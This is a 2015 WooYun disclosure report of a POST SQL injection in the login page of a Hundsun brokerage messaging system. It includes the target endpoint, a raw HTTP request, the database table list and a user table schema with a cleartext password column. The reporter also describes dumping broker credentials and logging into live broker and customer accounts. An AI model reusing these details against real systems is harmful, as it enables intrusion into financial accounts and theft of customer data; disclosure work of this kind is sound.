当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146171

漏洞标题:恒生电子某重要系统漏洞(可影响数家券商\二十万用户数据\可推送消息给券商客户)

相关厂商:hundsun.com

漏洞作者: 路人甲

提交时间:2015-10-12 14:38

修复时间:2015-11-30 18:18

公开时间:2015-11-30 18:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

请向下看

详细说明:

此系统网址http://www.hs-post.com/,官网介绍如下:

屏幕快照 2015-10-12 13.48.00.png


登录功能存在POST注入

POST /igenus/login.php?Cmd=login HTTP/1.1
Host: www.hs-post.com
Proxy-Connection: keep-alive
Content-Length: 43
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.hs-post.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hs-post.com/igenus/login.php?Cmd=error&Code=-1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,en-US;q=0.4
Cookie: LoginDomain=hundsun.com; PHPSESSID=vlclamq4inql9118005l9vkjo5
name=test&domain=hundsun.com&passwd=hundsun


数据库为vpopmail,19张表:

address
admin
auditLogs
auditLogs_copy
auditLogs_copy1
backupall
batchsend
card
dir_control
lastauth
logs
message
operLogs
personal
scheduler
stow
valias
vlog
vpopmail


登录账户密码等信息存放在vpopmail表中,共有210120条用户信息

+-----------------+-----------------+
| Column | Type |
+-----------------+-----------------+
| createtime | timestamp |
| pw_clear_passwd | varchar(16) |
| pw_dir | varchar(255) |
| pw_domain | varchar(64) |
| pw_gecos | varchar(48) |
| pw_gid | int(11) |
| pw_id | int(5) unsigned |
| pw_name | varchar(32) |
| pw_passwd | varchar(40) |
| pw_shell | varchar(20) |
| pw_uid | int(11) |
+-----------------+-----------------+


dump出各家券商postmaster的域和密码,密码信息打码

屏幕快照 2015-10-12 14.07.28.png


登录两个券商账户

屏幕快照 2015-10-12 13.31.19.png


屏幕快照 2015-10-12 13.35.58.png


登录客户账号看看融资融券信息,信息是最近的,可以证明系统正在使用中。

屏幕快照 2015-10-12 13.37.42.png

漏洞证明:

如上

修复方案:

请向上看

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-16 18:17

厂商回复:

非常感谢您的反馈,已进行处理。

最新状态:

暂无


漏洞评价:

评论